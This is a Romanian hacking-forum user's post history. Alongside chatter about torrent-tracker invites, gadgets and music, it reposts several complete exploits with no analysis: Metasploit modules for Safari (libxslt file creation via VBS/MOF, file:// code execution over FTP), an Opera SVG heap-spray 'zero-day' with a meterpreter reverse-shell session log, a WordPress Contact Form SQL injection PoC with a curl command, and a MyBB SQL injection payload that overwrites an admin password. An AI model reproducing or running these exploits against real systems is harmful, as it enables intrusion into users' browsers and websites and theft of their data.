-
Posts
2060 -
Joined
-
Last visited
-
Days Won
11
Everything posted by LLegoLLaS
-
dau eu 2 invitatii moca xtremezone,una scenefz,2 iptorrents Bani iti iei doar pe torrentleech ps: tu ceri ~11 euro pe fiecare cont?
-
## # $Id: safari_xslt_output.rb 13987 2011-10-18 07:39:50Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize(info = {}) super(update_info(info, 'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation', 'Description' => %q{ This module exploits a file creation vulnerability in the Webkit rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module has been tested on Safari and Maxthon. Code execution can be acheived by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS. }, 'License' => MSF_LICENSE, 'Author' => ['Nicolas Gregoire'], 'Version' => '$Revision: 13987 $', 'References' => [ ['CVE', '2011-1774'], ['OSVDB', '74017'], ['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'], ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ #Windows before Vista [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 20 2011')) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Check target before attacking agent = request.headers['User-Agent'] if agent !~ /Windows NT 5\.1/ or agent !~ /Safari/ or agent !~ /Version\/5\.0\.\d/ print_error("This target isn't supported: #{agent.to_s}") send_not_found(cli) return end url = "http://" url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] url += ":" + datastore['SRVPORT'] + get_resource() + "/" content = <<-EOS <?xml-stylesheet type="text/xml" href="#fragment"?> <!-- Define the DTD of the document This is needed, in order to later reference the XSLT stylesheet by a #fragment This trick allows to have both the XML and the XSL in the same file Cf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html --> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED >]> <doc> <!-- Define location and content of the files --> <mof> <location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\wbem\\mof\\#{@mof_name}]]></location> <content><![CDATA[#{@mof_content}]]></content> </mof><vbs> <location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\#{@vbs_name}]]></location> <content><![CDATA[#{@vbs_content}]]></content> </vbs> <!-- The XSLT stylesheet header, including the "sx" extension --> <xsl:stylesheet id="fragment" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:sx="http://icl.com/saxon" extension-element-prefixes="sx" xmlns="http://www.w3.org/1999/xhtml" > <xsl:output method="xml" indent="yes" /> <!-- The XSLT template --> <xsl:template match="/"> <!-- Define some XSLT variables --> <xsl:variable name="moflocation" select="//mof/location/text()"/> <xsl:variable name="vbslocation" select="//vbs/location/text()"/> <!-- Create the files --> <sx:output file="{$vbslocation}" method="text"> <xsl:value-of select="//vbs/content"/> </sx:output> <sx:output file="{$moflocation}" method="text"> <xsl:value-of select="//mof/content"/> </sx:output> <!-- Some output to the browser --> <html> </html> </xsl:template> </xsl:stylesheet> </doc> EOS #Clear the extra tabs content = content.gsub(/^\t\t/, '') print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, content, {'Content-Type'=>'application/xml'}) handler(cli) end def exploit # In order to save binary data to the file system the payload is written to a VBS # file and execute it from there via a MOF @mof_name = rand_text_alpha(rand(5)+5) + ".mof" @vbs_name = rand_text_alpha(rand(5)+5) + ".vbs" print_status("Encoding payload into vbs...") payload = generate_payload_exe @vbs_content = Msf::Util::EXE.to_exe_vbs(payload) print_status("Generating mof file...") @mof_content = generate_mof(@mof_name, @vbs_name) super end end Copyright 2011 - BugSearch About Us - Tell a Friend - Send sursa
-
Daca se intampla la noi acu eram bombardati .Asa suntem la cheremu' chinezilor(noi=restul lumii nu doar Romania).Isi ba pula de ce/cine vor
-
Atunci, preamarite Tziby, de ce nu cumperi de la ei?
-
## # $Id: safari_file_policy.rb 13967 2011-10-17 03:49:49Z todb $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # [url=http://metasploit.com/framework/]Metasploit Framework Penetration Testing Software | Metasploit Project[/url] ## require 'msf/core' require 'rex/service_manager' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer def initialize(info={}) super(update_info(info, 'Name' => "Apple Safari file:// Arbitrary Code Execution", 'Description' => %q{ This module exploits a vulnerability found in Apple Safari on OSX platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution under the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or a fileformat that OSX might automount), and then execute it in /Volumes/[share]. If there's some kind of bug that leaks the victim machine's current username, then it's also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. Please note that non-java payloads (*.sh extension) might get launched by Xcode instead of executing it, in that case please try the Java ones instead. }, 'License' => MSF_LICENSE, 'Version' => "$Revision: 13967 $", 'Author' => [ 'Aaron Sigel', # Initial discovery 'sinn3r', # Metasploit (also big thanks to HD, and bannedit) ], 'References' => [ ['CVE', '2011-3230'], ['URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments'], ['URL', 'http://support.apple.com/kb/HT5000'] ], 'Payload' => { 'BadChars' => "", }, 'DefaultOptions' => { 'ExitFunction' => "none", }, 'Platform' => [ 'unix', 'osx', 'java' ], 'Arch' => [ ARCH_CMD, ARCH_JAVA ], 'Targets' => [ [ 'Safari 5.1 on OSX', {} ], [ 'Safari 5.1 on OSX with Java', {} ] ], 'Privileged' => true, 'DisclosureDate' => "Oct 12 2011", #Blog date 'DefaultTarget' => 0)) register_options( [ OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']), OptPort.new('SRVPORT', [true, "The local port to use for the FTP server (Do not change)", 21 ]), OptPort.new('HTTPPORT', [true, "The HTTP server port", 80]) ], self.class ) end # # Start the FTP aand HTTP server # def exploit # The correct extension name is necessary because that's how the LauncherServices # determines how to open the file. ext = (target.name =~ /java/i) ? '.jar' : '.sh' @payload_name = Rex::Text.rand_text_alpha(4 + rand(16)) + ext # Start the FTP server start_service() print_status("Local FTP: #{lookup_lhost}:#{datastore['SRVPORT']}") # Create our own HTTP server # We will stay in this functino until we manually terminate execution start_http() end # # Lookup the right address for the client # def lookup_lhost(c=nil) # Get the source address if datastore['SRVHOST'] == '0.0.0.0' Rex::Socket.source_address( c || '50.50.50.50') else datastore['SRVHOST'] end end # # Override the client connection method and # initialize our payload # def on_client_connect(c) r = super(c) @state[c][:payload] = regenerate_payload(c).encoded r end # # Handle FTP LIST request (send back the directory listing) # def on_client_command_list(c, arg) conn = establish_data_connection(c) if not conn c.put("425 Can't build data connection\r\n") return end print_status("Data connection setup") c.put("150 Here comes the directory listing\r\n") print_status("Sending directory list via data connection") month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'] m = month_names[Time.now.month-1] d = Time.now.day y = Time.now.year dir = "-rwxr-xr-x 1 ftp ftp #{@state[c][:payload].length.to_s} #{m} #{d} #{y} #{@payload_name}\r\n" conn.put(dir) conn.close print_status("Directory sent ok") c.put("226 Transfer ok\r\n") return end # # Handle the FTP RETR request. This is where we transfer our actual malicious payload # def on_client_command_retr(c, arg) conn = establish_data_connection(c) if not conn c.put("425 can't build data connection\r\n") return end print_status("Connection for file transfer accepted") c.put("150 Connection accepted\r\n") # Send out payload conn.put(@state[c][:payload]) conn.close return end # # Handle the HTTP request and return a response. Code borrorwed from: # msf/core/exploit/http/server.rb # def start_http(opts={}) # Ensture all dependencies are present before initializing HTTP use_zlib comm = datastore['ListenerComm'] if (comm.to_s == "local") comm = ::Rex::Socket::Comm::Local else comm = nil end # Default the server host / port opts = { 'ServerHost' => datastore['SRVHOST'], 'ServerPort' => datastore['HTTPPORT'], 'Comm' => comm }.update(opts) # Start a new HTTP server @http_service = Rex::ServiceManager.start( Rex::Proto::Http::Server, opts['ServerPort'].to_i, opts['ServerHost'], datastore['SSL'], { 'Msf' => framework, 'MsfExploit' => self, }, opts['Comm'], datastore['SSLCert'] ) @http_service.server_name = datastore['HTTP::server_name'] # Default the procedure of the URI to on_request_uri if one isn't # provided. uopts = { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }.update(opts['Uri'] || {}) proto = (datastore["SSL"] ? "https" : "http") print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}") if (opts['ServerHost'] == '0.0.0.0') print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}") end # Add path to resource @service_path = uopts['Path'] @http_service.add_resource(uopts['Path'], uopts) # As long as we have the http_service object, we will keep the ftp server alive while @http_service select(nil, nil, nil, 1) end end # # Kill HTTP/FTP (shut them down and clear resources) # def cleanup super # Kill FTP stop_service() # clear my resource, deregister ref, stop/close the HTTP socket begin @http_service.remove_resource(datastore['URIPATH']) @http_service.deref @http_service.stop @http_service.close @http_service = nil rescue end end # # Ensures that gzip can be used. If not, an exception is generated. The # exception is only raised if the DisableGzip advanced option has not been # set. # def use_zlib if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!" end end # # Returns the configured (or random, if not configured) URI path # def resource_uri path = datastore['URIPATH'] || random_uri path = '/' + path if path !~ /^\// datastore['URIPATH'] = path return path end # # Handle HTTP requets and responses # def on_request_uri(cli, request) agent = request.headers['User-Agent'] if agent !~ /Macintosh; Intel Mac OS X/ or agent !~ /Version\/5\.\d Safari\/(\d+)\.(\d+)/ print_error("Unsupported target: #{agent}") send_response(cli, 404, "Not Found", "<h1>404 - Not Found</h1>") return end html = <<-HTML <html> <head> <base href="file://"> <script> function launch() { document.location = "/Volumes/#{lookup_lhost}/#{@payload_name}"; } function share() { document.location = "ftp://anonymous:anonymous@#{lookup_lhost}/"; setTimeout("launch()", 2000); } share(); </script> </head> <body> </body> </html> HTML send_response(cli, 200, 'OK', html) end # # Create an HTTP response and then send it # def send_response(cli, code, message='OK', html='') proto = Rex::Proto::Http::DefaultProtocol res = Rex::Proto::Http::Response.new(code, message, proto) res['Content-Type'] = 'text/html' res.body = html cli.send_response(res) end end =begin - Need to find a suitable payload that can be executed without warning. Certain executables cannot be executed due to permission issues. A jar file doesn't have this problem, but we still get a "Are you sure?" warning before it can be executed. - Allow user-specified port to automount the share - Allow ftp USERNAME/PASSWORD (optional) =end sursa
-
WordPress Contact Form plugin <= 2.7.5 SQL Injection 2011-10-14 15:15:02 # Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability # Date: 2011-10-13 # Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo) # Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip # Version: 2.7.5 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)[ E.G curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1 --------------- Vulnerable code --------------- public function the_content($content) { global $wpdb; global $table_name; global $settings_table_name; $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy'; if ($_POST['wpcf_easyform_submitted'] == 1) { $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']); --------------- Patch --------------- *** ./easy-form.class.php.orig 2011-10-13 19:53:05.674800956 -0400 --- ./easy-form.class.php 2011-10-13 19:51:21.442799615 -0400 *************** *** 54,61 **** $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy'; if ($_POST['wpcf_easyform_submitted'] == 1) { ! ! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']); $continue = true; --- 54,63 ---- $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy'; if ($_POST['wpcf_easyform_submitted'] == 1) { ! $wpcf_easyform_formid=$_POST['wpcf_easyform_formid']; ! $wpcf_easyform_formid=substr($wpcf_easyform_formid,2); ! ! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid); $continue = true; *************** *** 71,80 **** if ($continue) { //loop through the fields of this form (read from DB) and build the message here ! $form_fields = $wpdb->get_results(" SELECT * FROM $settings_table_name ! WHERE form_id = ".$_POST['wpcf_easyform_formid']." ORDER BY position "); --- 73,82 ---- if ($continue) { //loop through the fields of this form (read from DB) and build the message here ! $form_fields = $wpdb->get_results(" SELECT * FROM $settings_table_name ! WHERE form_id = ".$wpcf_easyform_formid." ORDER BY position "); sursa
-
Cel mai usor laptop din lume e unul romanesc! De la Evolio
LLegoLLaS replied to Nytro's topic in Stiri securitate
Pare bun.In plus ma gandesc ca va fi mai avantajos pentru noi ca pret fiind produs aici (ma rog...asamblat). ps: sa mor daca am auzit de evolio -
misto Are cineva negativul de la asta? Zippyshare.com - Parazitii - Breathe (DJ Fruitcake mix).mp3 (seamana dar nu e al de la blu cantrel si sean paul)
- 15 replies
-
- parazitii radio
- parazitii.eu
-
(and 2 more)
Tagged with:
-
aduce mai mult a ''Adsense Pitzi del Pitzi''
-
download freemocafarabani: http://www.4shared.com/file/DE7YKQeL/5c-basicmagicpaper__wwwmobileg.html
-
############################################################################################################### # Exploit for Opera Browser 10/11/12 (SVG layout) Memory Corruption (0day) # # Vulnerability: # # Discovered: 2010-10-13 # Patched: 0day # Tested on: v10.xx (v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63) # v11.xx (v11.00, v11.01, v11.10, v11.11, v11.50 and v11.51) # # Exploit: # # Coded: 2010-10-14 # Last revision: 2011-10-08 # # This exploit was modified with a new poc and triggering method, to hit Opera Next. The first copy was coded for v10.5x/v10.6x. # # RCE on: v11.00, v11.01, v11.10, v11.11, v11.50, v11.51 and v12.00 pre-alpha r1076 (Opera Next) # # Notes: # # 1) DEP bypass: possible but unreliable. # 2) Let me know if you improve this one # 3) Two days ago, Opera Next was updated to 12.00 pre-alpha r1085 # and this exploit is less reliable, even sometimes never gets crashed. # Anyway, I've also seen remote code execution. # # # Credits: Jose A. Vazquez of http://spa-s3c.blogspot.com]:::::0th3r ****ing S3Cbl0g:::: Only 4 Fun & pr0fit # # Greets to: Ruben, Sinn3r, Metasploit Team, Corelan Team, EnRed20.org, etc # # # Running against Opera v12.00 pre-alpha r1076... # # # # =[ metasploit v4.0.1-dev [core:4.0 api:1.0] # + -- --=[ 742 exploits - 378 auxiliary - 83 post # + -- --=[ 228 payloads - 27 encoders - 8 nops # =[ svn r13810 updated today (2011.10.06) # # msf > use windows/browser/opera_svg_0day # msf exploit(opera_svg_0day) > set payload windows/meterpreter/reverse_tcp # payload => windows/meterpreter/reverse_tcp # msf exploit(opera_svg_0day) > set LHOST 192.168.1.103 # LHOST => 192.168.1.103 # msf exploit(opera_svg_0day) > exploit # [*] Exploit running as background job. # msf exploit(opera_svg_0day) > # [*] Started reverse handler on 192.168.1.103:4444 # [*] Using URL: http://0.0.0.0:8080/dpIDdyCpEoqCa5 # [*] Local IP: http://192.168.1.103:8080/dpIDdyCpEoqCa5 # [*] Server started. # [*] Sending Opera Browser 10/11/12 (SVG layout) Memory Corruption to 192.168.1.104:1233 (Method: usual / Target: Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off)) # [*] Sending stage 1 (Spraying the heap) # [*] Sending stage 2 (Triggering the vulnerability) # [*] Sending Opera Browser 10/11/12 (SVG layout) Memory Corruption to 192.168.1.104:1233 (Method: usual / Target: Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off)) # [*] Sending stage (752128 bytes) to 192.168.1.104 # [*] Sending stage 1 (Spraying the heap) # [*] Meterpreter session 2 opened (192.168.1.103:4444 -> 192.168.1.104:1234) at 2011-10-08 22:32:31 +0200 # Interrupt: use the 'exit' command to quit # msf exploit(opera_svg_0day) > sessions # # Active sessions # =============== # # Id Type Information Connection # -- ---- ----------- ---------- # 1 meterpreter x86/win32 0XDE1-A39ED4C12\0xde1 @ 0XDE1-A39ED4C12 192.168.1.103:4444 -> 192.168.1.104:1234 # # msf exploit(opera_svg_0day) > sessions -i 1 # [*] Starting interaction with 1... # # meterpreter > execute -f calc.exe # Process 1752 created. # meterpreter > exit # [*] Shutting down Meterpreter... # # [*] Meterpreter session 1 closed. Reason: User exit # msf exploit(opera_svg_0day) > # ################################################################################################################ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Opera Browser 10/11/12 (SVG layout) Memory Corruption', 'Description' => %q{ This module exploits a vulnerability in the bad nesting with SVG tags. Successfully exploiting leads to remote code execution or denial of service condition under Windows XP SP3 (DEP = off). Best results of reliability using Opera v12.00 pre-alpha r1076 whereas that v11.xx will have less success (depending of opera.dll version). This module won't work against v10.xx because it was modified to exploit Opera upper to v11. Read the lastest references for further details. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jose A. Vazquez' ], 'Version' => '$Revision: 0011 $', 'References' => [ ['URL', 'http://www.beyondsecurity.com/ssd.html'], ['URL', 'http://spa-s3c.blogspot.com/2011/10/spas3c-sv-006opera-browser-101112-0-day.html'], # English ['URL', 'http://enred20.org/node/27'] # Spanish ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'HTTP::compression' => 'gzip', 'HTTP::chunked' => true }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'Compat' => { 'ConnectionType' => '-find', }, 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Targets' => [ # spray of ~ 450 MB. [ 'Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off)', { 'Method' => 'usual', 'MaxOffset' => nil, 'MaxSize' => nil, 'MaxBlocks' => 900, 'Ret' => 0x0c0c0c0c } ], # Thanks to sinn3r of metasploit.com for this method. [ 'Opera Browser (v11.xx) / Windows XP SP3 (DEP-off)', { 'Method' => 'precise-allocation-size', 'MaxOffset' => 0x800, 'MaxSize' => 0x80000, 'MaxBlocks' => 0x500, 'Ret' => 0x0c0c0c0c } ] ], 'DisclosureDate' => '0day', 'DefaultTarget' => 0)) #Apply obfuscation by default register_options( [ OptBool.new('OBFUSCATE', [false, 'JavaScript obfuscation', true]) ], self.class) end def on_request_uri(cli, request) mytarget = target if(request.uri =~ /\.xhtml$/) #Send file for trigger the vulnerability html = %Q| <html xmlns="http://www.w3.org/1999/xhtml" xmlns:svt="http://www.w3.org/2000/svg"> <head> <meta http-equiv="refresh" content="0;url=" /> </head> <select1 style = 'padding-bottom: 8711px;background-image: url("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH");' > <svt:svg> <svt:title style = 'pointer-events: visiblePainted;font: normal small-caps 120%/120% fantasy;' > <svt:svg> <svt:font> <svt:animateMotion> feFuncR </svt:animateMotion> </svt:font> </svt:svg> </svt:title> </svt:svg> </select1> </html> | #Send triggerer print_status("Sending stage 2 (Triggering the vulnerability)") var_contentype = 'application/xhtml+xml' else #Sending init HTML print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (Method: #{mytarget['Method']} / Target: #{mytarget.name})") return if ((p = regenerate_payload(cli)) == nil) shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch)) addr_word = [mytarget.ret].pack('V').unpack('H*')[0][0,4] var_timer_trigger = (rand(3) + 2) * 1000 var_file_trigger = rand_text_alpha(rand(30)+2) #Build the exploit var_url = ((datastore['SSL']) ? "https://" : "http://") var_url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']) var_url << ":" + datastore['SRVPORT'] var_url << get_resource #Choose the heap spray method if(mytarget['Method'] == 'usual') spray_js = <<-JS var shell = unescape("#{shellcode}"); var size = shell.length * 2; var nopsize = 0x100000 - (size + 0x14); var nopsled = unescape("%u#{addr_word}"); while(nopsled.length * 2 < nopsize) { nopsled += nopsled; } var blocks = new Array(); for (var x = 0; x < #{mytarget['MaxBlocks']}; x++) { blocks[x] = nopsled + shell; } function TriggerVuln(){ document.write("<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>"); } JS else # # Tested on Opera v11.5x but it's not working on Opera v12.00 pre-alpha # # /* # * Heap spray for Opera that uses VirtualAlloc # * Arguments: # * @blocks - an emtpy array # * @code - the payload # * @offset - padding to align the code # * @chunk_max - max size for each allocation # * @blocks_max - max blocks # */ # # spray_js = <<-JS function heap_spray(blocks, code, offset, chunk_max, blocks_max) { if (chunk_max < 0x7F000) { throw "This function is meant for size 0x7F000 or higher to trigger VirtualAlloc"; } chunk_max /= 2; var nops = unescape("??"); while (nops.length < chunk_max) nops += nops; var offset_chunk = nops.substr(0, offset-code.length); var block = offset_chunk + code + nops.substr(0, chunk_max-offset_chunk.length-code.length); while (block.length % 8 != 0) block += unescape(""); var shellcode = block.substr(0, (chunk_max-0x1c)/2); for (var i=0; i < blocks_max; i++) { blocks[i] = shellcode + unescape("?"); } } var blocks = new Array(); var code = unescape("#{shellcode}"); heap_spray(blocks, code, #{mytarget['MaxOffset']}, #{mytarget['MaxSize']}, #{mytarget['MaxBlocks']}); function TriggerVuln(){ document.write("<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>"); } JS end if datastore['OBFUSCATE'] == true spray_js = ::Rex::Exploitation::JSObfu.new(spray_js) spray_js.obfuscate trigger_sym = spray_js.sym('TriggerVuln') spray_js = spray_js.to_s + "setTimeout('#{trigger_sym}()',#{var_timer_trigger});" else spray_js = spray_js.to_s + "setTimeout('TriggerVuln()',#{var_timer_trigger});" end html = %Q| <html> <head> <script type="text/javascript"> #{spray_js} </script> </head> <html> | print_status("Sending stage 1 (Spraying the heap)") var_contentype = 'text/html' end #Response send_response(cli, html, { 'Content-Type' => var_contentype, 'Pragma' => 'no-cache' }) #Handle the payload handler(cli) end end sursa
-
Author : Mario_Vs Date : 10/10/2011 Site : http://mariovs.pl/ @ : mario_vs[at]o2.pl --------------------------------------------------------------------- Description > Vendor : MyBB - Mods - Download License Tested On : Windows 7 --------------------------------------------------------------------- SQL Injection >> userbarsettings.php POST -> setting1=1&setting2=1&setting3=3&image2=1',password='90be07bf33c5e547c3e78b236a83f497',salt='aXZV15uC&uid=1&submit=Submit Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2 sursa
-
nu ai pus-o bine sau e de proasta calitate.Vezi sa nu aiba vreo folie lipita pe sub ea
-
Bine ai venit.Cunostinte?
-
in princiupiu a zis bine...se [poate ''reface''.Am impresia ca stie dar vrea sa para mai interesant daca se face ca nu cunoaste deloc domeniul
-
S-a mai documentat si badea cum functioneaza furtisagurile online(keyloggere etc) .Inainte spunea ca ca nu il intereseaza pcurile )
-
cu magneti neodym?
-
shjpla . lauda-te cu ce stii si ce inseamna pentru tine 'ecar
-
Bine ai venit. Defineste ''Nu sunt un hacker expert dar nici amator" (Cunostinte)
-
Bine-ai venit , incearca sa eviti prescurtarile (''tov'') @DotA sa fim seriosi...
-
VIDEO: primul telefon cu ecran flexibil - Samsung Galaxy Skin
LLegoLLaS replied to Nytro's topic in Stiri securitate
''foarte tare'' dar din ce vad este un ecran LED, la care in loc de sticla s-a folosit material flexibil (ca in furtunele de gradina ). Oricum interesant -
ala e un troll altoit:))
-
Sa-l futa orcii!Are nume de inginer la SC TBC